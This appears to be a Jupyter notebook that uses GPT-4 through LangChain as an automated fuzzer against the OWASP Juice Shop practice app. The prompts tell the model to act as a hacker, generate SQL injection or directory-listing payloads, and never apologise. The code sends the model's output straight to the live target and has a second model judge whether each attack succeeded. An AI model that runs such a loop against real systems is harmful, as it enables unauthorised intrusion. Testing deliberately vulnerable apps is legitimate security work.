In [2]:
from dotenv import load_dotenv
load_dotenv()
import requests
from langchain.prompts import (
    ChatPromptTemplate,
    MessagesPlaceholder,
    SystemMessagePromptTemplate,
    HumanMessagePromptTemplate,
)
from langchain.chains import ConversationChain
from langchain.chat_models import ChatOpenAI
from langchain.memory import ConversationBufferMemory

DESCRIPTION = "Your goal is to find SQL injections or directory listing. You know the best and lastest attack vectors for different databases. Try harder. Try different and advanced attack vectors and give your best!!!"


In [3]:
import requests
import json


def post_request_with_json(url, payload):
    """
    Send a POST request with JSON payload to the specified URL.
    
    Args:
        url (str): The URL to which the request will be sent.
        payload (dict): The JSON payload to be sent in the request.

    Returns:
        dict: The response JSON data if the request was successful, None otherwise.
    """
    headers = {'Content-Type': 'application/json'}

    try:

        json_payload = payload
        response = requests.post(url, data=json_payload, headers=headers)

        return response.content  # Return the response JSON data
    except Exception as e:
        print(f"An error occurred: {str(e)}")
        return response.json()



In [4]:
def get_request(url):
    try:
        response = requests.get(url)

        return f"HTTP/{response.raw.version/10} {response.raw.status} {response.raw.reason} {response.content}"   # Return the response JSON data
    except Exception as e:
        print(f"An error occurred: {str(e)}")
        return response.json()

In [ ]:


attack_URL = {
    1: "https://juice-shop.herokuapp.com/rest/user/login",
    2: "https://juice-shop.herokuapp.com/rest/products/search?q=",
    3: "https://juice-shop.herokuapp.com/",
    4: "https://juice-shop.herokuapp.com/support/"
}

attack_description = {
    1: "Analyse this json String {\"email\":\"asdsdf\",\"password\":\"asd\"}. Act as an hacker and replace one random value in the json object with an attack payload to exploit vulnerability. Return only the attack vector and never normale text. Do not apologize if an error will happen!",
    2: "Analyse this URL: https://juice-shop.herokuapp.com/rest/products/search?q= . Act as an hacker and append an attack payload to exploit vulnerability. Return only the attack vector and never normale text. Do not apologize if an error will happen!",
    3: "Find directory listing by extending this url: https://juice-shop.herokuapp.com/ from a web shop. Return only one URL and do not repeat an url and never normale text. Do not apologize if an error will happen!.",
    4: "The target is a web shop. Find common directorys by extending this url: https://juice-shop.herokuapp.com/support/ . Do not use one or more dots! Return only one URL and do not repeat an url and never normale text. Do not apologize if an error will happen!. You have already tried: "
}

LEVEL = 4



if __name__ == "__main__":
    while True:
        prompt = ChatPromptTemplate.from_messages(
            [
                SystemMessagePromptTemplate.from_template(DESCRIPTION),
                MessagesPlaceholder(variable_name="history"),
                HumanMessagePromptTemplate.from_template("{input}"),
            ]
        )

        llm = ChatOpenAI(model="gpt-4")
        memory = ConversationBufferMemory(return_messages=True)
        conversation = ConversationChain(memory=memory, prompt=prompt, llm=llm)

        detector = ChatOpenAI(model="gpt-4")
        detector_prompt_SQL = """An attack especially then successful when an SQL Error or a directory listing appears! I will provide you an Attack Vector and one response for that vector, was the attack successful? Just answer with Yes or No

        ====================
        SQL Attack Vector:{A}
        RESPONSE:{Q}
        ====================
        """

        A = attack_description[LEVEL]
        print("[+] \033[94mStart: \033[0m:", A)

        password = "UNKNOWN"
        for _ in range(10):
            if password=="Yes":
                print("You got it! Hacked!")
                break
            else:
                Q = conversation.predict(input=A)
                print("[+] \033[91mFuzzer\033[0m:", Q)
                url = attack_URL[LEVEL]
                payload = str(Q)
                if LEVEL == 1:
                    Q = post_request_with_json(url, payload)
                else:
                    url=payload
                    Q = get_request(url)
                password = detector.predict(detector_prompt_SQL.format(A=payload, Q=str(Q))).strip()
                print("[+] \033[94mDetector\033[0m:", str(Q))
                print("[+] \033[94mDetector\033[0m:", password)
                if LEVEL == 4:
                    attack_description[LEVEL] = attack_description[LEVEL] + payload
                    A = attack_description[LEVEL]
                else:
                    A = attack_description[LEVEL]  + " - The last response without success was: " + str(Q)
                
        else:
            print("You failed!")
            continue
        break